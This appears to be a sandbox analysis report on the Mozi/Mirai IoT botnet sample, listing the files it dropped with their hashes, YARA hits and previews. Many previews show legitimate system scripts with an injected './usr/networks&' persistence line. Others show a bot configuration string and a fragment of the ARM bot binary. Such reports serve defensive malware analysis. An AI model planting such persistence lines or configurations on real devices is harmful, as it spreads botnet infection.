                                                              SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                              SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):290
                                                              Entropy (8bit):4.882721265987431
                                                              Encrypted:false
                                                              SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/XF/RRaEtMFtbUrQQxXDzraOn3zuTTn9:AF+Ftb4HaU3zuMF+Ftb4HaU3zuV
                                                              MD5:08BA44D1BC18F09E8AE5FF694F128A28
                                                              SHA1:E08EAA84BB63D00A89919B22BE80638337F4132C
                                                              SHA-256:ED6C2167CBB5FE7DA4D3593F8087A05A027D8820D47ABDA1342E1478E12B02B5
                                                              SHA-512:0459DEB8A18AC93D4EBD60602F498D0578986BC94CEB7E247845332A59B183D9F01CB91918108B51EB2BE779DA1F123CD3CC7742E55F5C642A211F104B315463
                                                              Malicious:false
                                                              Preview:2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]-2076960834.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1914
                                                              Entropy (8bit):4.829445473341419
                                                              Encrypted:false
                                                              SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                              MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                              SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                              SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                              SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                              Malicious:true
                                                              Preview:./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):37310
                                                              Entropy (8bit):4.959652179113969
                                                              Encrypted:false
                                                              SSDEEP:768:Y2l/oQ5nj2Zuv9pPOkUNW58rhUpm/AHgf7AN/0KK0SAQiAlcYm/qr6HZtda9Ts5w:Y2l/oQFj2Zuv9pPmNW58rhUpm/AHgf7H
                                                              MD5:4C8E78D6A4073616C23D20694FDED604
                                                              SHA1:4C22CE08AE9B9C3409D48F83874113765CCF819C
                                                              SHA-256:BC8CFDD1A1E411786C084CD7674D81899506C9059F65E181AACA1185AD0573D1
                                                              SHA-512:6D80B1A699BE6B8A881989FE42253594DA849B7D4CDA7073E614E9C4DEA828A0E795962CAB736D82A94AD159525219477561050A3897A7D9D2DAD2E1181DD21A
                                                              Malicious:true
                                                              Preview:./usr/networks&. exit 1;. fi. # Not necessary just use double quotes around variable to preserve new lines. #hosts=`echo $hosts | tr ' ' '\n'`.}..# Return hosts. /proc/scsi/HOSTADAPTER/? must exist.findhosts ().{. hosts=. for driverdir in /proc/scsi/*; do. driver=${driverdir#/proc/scsi/}. if test $driver = scsi -o $driver = sg -o $driver = dummy -o $driver = device_info; then continue; fi. for hostdir in $driverdir/*; do. name=${hostdir#/proc/scsi/*/}. if test $name = add_map -o $name = map -o $name = mod_parm; then continue; fi. num=$name. driverinfo=$driver. if test -r "$hostdir/status"; then. num=$(printf '%d\n' "$(sed -n 's/SCSI host number://p' "$hostdir/status")"). driverinfo="$driver:$name". fi. hosts="$hosts $num". echo "Host adapter $num ($driverinfo) found.". done. done.}..printtype ().{. local type=$1.. case "$type" in. 0) echo "Direct-Access" ;;. 1) echo "Sequential-Access" ;;. 2) echo "Pr
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                                              Category:dropped
                                                              Size (bytes):307200
                                                              Entropy (8bit):5.824683494234165
                                                              Encrypted:false
                                                              SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ7:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBf
                                                              MD5:9BC075B91BC1088C6E230FACC6510824
                                                              SHA1:45E936D0278B04663B9375337B2D21AFB44C361F
                                                              SHA-256:18E3658C5F62EF2FCD76B0EC25243D979741BF640A76513F121B40A83399A511
                                                              SHA-512:036B280A052E19CC5B64B43957B157210814C37C867E1480CCE61C9F955D04F341C0001DE88752083025F89F07D3147FF6CB65670E9E20291F628D1EB883DEBB
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                              • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                              • Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                              • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                              • Rule: Linux_Trojan_Mirai_5c62e6b2, Description: unknown, Source: /usr/networks, Author: unknown
                                                              • Rule: Linux_Trojan_Mirai_77137320, Description: unknown, Source: /usr/networks, Author: unknown
                                                              • Rule: Linux_Trojan_Mirai_ac253e4f, Description: unknown, Source: /usr/networks, Author: unknown
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                              Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):47
                                                              Entropy (8bit):3.90242960796693
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vvLQVOORgn:uTn
                                                              MD5:DF2ACF286726B02D483BEF86C91F7FA8
                                                              SHA1:9E6A2422A7C3FBC0FCB34D314AF55D1452489DF0
                                                              SHA-256:7BD4E13877E1F1E9AA5729AC8AF468E0C660DBCCADEF25C67DA99DE49F7AE549
                                                              SHA-512:E99CFC15E6638CB9DA788C4B5744FF2170E183DC2A271847931E1C991C2D9049D1FF9C4EF49D7A7A348EE24DD994C0EA7048CDC4E6245930279F6A79E69312B9
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text, with very long lines (379)
                                                              Category:dropped
                                                              Size (bytes):25464
                                                              Entropy (8bit):5.453877096685684
                                                              Encrypted:false
                                                              SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                              MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                              SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                              SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                              SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                              Malicious:false
                                                              Preview:./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4725
                                                              Entropy (8bit):5.44928341819888
                                                              Encrypted:false
                                                              SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                              MD5:B4F115765D68E40BEBB845FA7F437539
                                                              SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                              SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                              SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                              Malicious:false
                                                              Preview:./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text, with CR, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):11664
                                                              Entropy (8bit):5.539741046843357
                                                              Encrypted:false
                                                              SSDEEP:192:4RRRNryQ7F6avUvZswuHZkzTm8arUeo0vq2yS7b1KYMe7H/6:XQ7F61swuHZ6m8feNq2yDYMEH/6
                                                              MD5:1B1A8B842BC45126EC5B709423446B59
                                                              SHA1:99A49AE47721C62FE7659B23485AA3464B76CEC3
                                                              SHA-256:E0FDE03C3CF51CA06A2F393BA43C4060AA0B52DDF96CDEE5F770ABC978CF49D0
                                                              SHA-512:07DDD8C5C68B6510E12D14FCA6086E5AB0D42D0D4FA9084D53CC368172BB8847B05A1040CB787A2F489B1C35A443C8920074F2F6F95106B73C9185141555D226
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..# Printing options: number of copies and page ranges.[ -z "$NB" ] && NB=1.PAGERANGES=$(getOption page-ranges)..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3399
                                                              Entropy (8bit):5.296419005515725
                                                              Encrypted:false
                                                              SSDEEP:96:QWswTl5TVnavmj+iHgvy/pHJvyWEz2a77:Zs4fVna9eKz2E
                                                              MD5:6CA46C23DC6233BE77F0FD904C493D83
                                                              SHA1:674B36A91CB4B815E3657F3060C88BC4EB071C95
                                                              SHA-256:4E211F67F09E4E37EBB63EA30570A4E623ED1A185F0CCBB947104BF6775E04AA
                                                              SHA-512:AC68CCEC39B7E40C7BD8982DA57F53D95CA5839591DC1A0368AEC531A0D905602D876CF830792138AC070BE897E2893DA2C3CA3F268DB81A0BCC1843E9C7B262
                                                              Malicious:false
                                                              Preview:./usr/networks&.[ $? = 0 ] || exit 1.DUPLEX=$(getOption Duplex).[ -n "$DUPLEX" ] || DUPLEX=None.ZFOLDING=$(getOption ZFolding).[ -n "$ZFOLDING" ] || ZFOLDING=False.SIDEWAYS=$(getOption SideWays).[ -n "$SIDEWAYS" ] || SIDEWAYS=False.SADDLESTITCH=$(getOption SaddleStitch).[ -n "$SADDLESTITCH" ] || SADDLESTITCH=False.TABLE=$(getOptionNumber IndexTable).[ $? = 0 ] || exit 1.MULTIPLEIMPACT=$(getOptionNumber IndexMultipleImpact).[ $? = 0 ] || exit 1.HWPAGENUMBER=$(getOption HardwarePageNumber)..# Convert from 100th of mm to Inch fraction.mmToIndexIn () {. # 100th of mm. MM=$1.. # 120th of inches. IN120=$(($MM * 12 / 254)).. # Integer part. INT=$(($IN120 / 120 )).. # Fractional part, first in 120th of inch. FRAC=$(($IN120 % 120)).. # Convert to Index-specific values. if [ $FRAC -lt 30 ]; then. # Round down to zero. FRAC=0. elif [ $FRAC -ge 30 -a $FRAC -lt 40 ]; then. # Round down to a quarter. FRAC=1. elif [ $FRAC -ge 40 -a $FRAC -lt 60 ]; then. # Round down to a
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1587
                                                              Entropy (8bit):5.05148558164496
                                                              Encrypted:false
                                                              SSDEEP:48:yvwpsuotO0I1cCkS+DYLYWYZ3rwi+BKjg/D+RJSW9L:Cfzo+SXEA7eSWV
                                                              MD5:110002C4A9588D6E696253D0DE3C9978
                                                              SHA1:C3C1B6798FD324BE31D732FFEFA1C7D7C5382F22
                                                              SHA-256:91B0701CA62899B36DFEE8458643FA6DBEA36BB838C3E3C1C9E1DC6717F10BA8
                                                              SHA-512:2DA3BA7043DF2C78BAB6435010040FA44EFE774C687165CCB91DA124E25C8D6C41CDBD50B25276AF21D18E3F31DAE4232DBF93E78B9363ECA133E7CB74AD7BD6
                                                              Malicious:false
                                                              Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. case "$PAPERLENGTH" in. In). INIT+=,PW$(mmToIndexIn $PAGEWIDTH),PL$(mmToIndexIn $PAGEHEIGHT). ;;. Mm). INIT+=,PW$(($PAGEWIDTH / 100)),PL$(($PAGEHEIGHT / 100)). ;;. *) ;;. esac.. case $LINESPACING in. 250) INIT+=,LS0 ;;. 375) INIT+=,LS1 ;;. 450) INIT+=,LS2 ;;. 475) INIT+=,LS3 ;;. 500) INIT+=,LS4 ;;. 525) INIT+=,LS5 ;;. 550) INIT+=,LS6 ;;. 750) INIT+=,LS7 ;;. 1000) INIT+=,LS8 ;;. *). if [ $FIRMWARE -lt 120130 ]. then..echo "ERROR: unsupported $LINESPACING line spacing, please upgrade firmware to at least 12.01.3" >&2..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1055
                                                              Entropy (8bit):5.0066328703681355
                                                              Encrypted:false
                                                              SSDEEP:24:a8seltmT9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:hs6tSDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                              MD5:E43BA2CA058B0AAC31BDF024BEE7ABE6
                                                              SHA1:C78B616DBE567DCE177DA3553702F2FDCBEC07E8
                                                              SHA-256:BF15B97CF5C1CD1D078ECF5B9B2454E6E95AC314AE6B0808AD093EFDF5508197
                                                              SHA-512:AC9AC10BA0E853CF70AE2239710A9F7A661D604F0125150C72963461874C497FC2C4BCD8B42E15C062A77DB2BD8D0F2F7E6053CDAB7113CC31FCAC7F65F95724
                                                              Malicious:false
                                                              Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. INIT+=,CH$PRINTABLETEXTWIDTH,LP$PRINTABLETEXTHEIGHT.. case $LINESPACING in. 500) INIT+=,LS50 ;;. 1000) INIT+=,LS100 ;;. *). echo "ERROR: unsupported $LINESPACING line spacing" >&2. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1816
                                                              Entropy (8bit):4.732022360765176
                                                              Encrypted:false
                                                              SSDEEP:48:8MTeMn/zV5rh/1RzUKHjuuOGp2fVU6GjJN+V4ATo+aZ+:heCrhXH+DfVpmhC/
                                                              MD5:1851CA5690400777129B4D3C6B58D4D2
                                                              SHA1:5AB880AE743FB6EA929BF372A64B9689BD7D660F
                                                              SHA-256:75DECCF74010FCBCF95DB88A5885700E743EA339EE2C8DB44D80D97403E30443
                                                              SHA-512:61986E49AFA511BFA970B3C781B3E7FB2F43546A01B167F45D1769A958A5EEFCEFA37089BD738EDD2BB2BCB1A3C0500FABF49EF39DA5F226A2B5C44698CA52CC
                                                              Malicious:false
                                                              Preview:./usr/networks&. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-support's '/usr/share/acpi-support/policy-funcs' file...getXconsole.PMS="gnome-power-manager kpowersave xfce4-power-manager".PMS="$PMS guidance-power-m
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):309
                                                              Entropy (8bit):4.972882784760757
                                                              Encrypted:false
                                                              SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                              MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                              SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                              SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                              SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                              Malicious:false
                                                              Preview:./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3647
                                                              Entropy (8bit):4.544491450799858
                                                              Encrypted:false
                                                              SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                              MD5:734F4010B22A9F64DBCCED57155A6396
                                                              SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                              SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                              SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                              Malicious:false
                                                              Preview:./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                              Process:/tmp/Mozi.m.elf
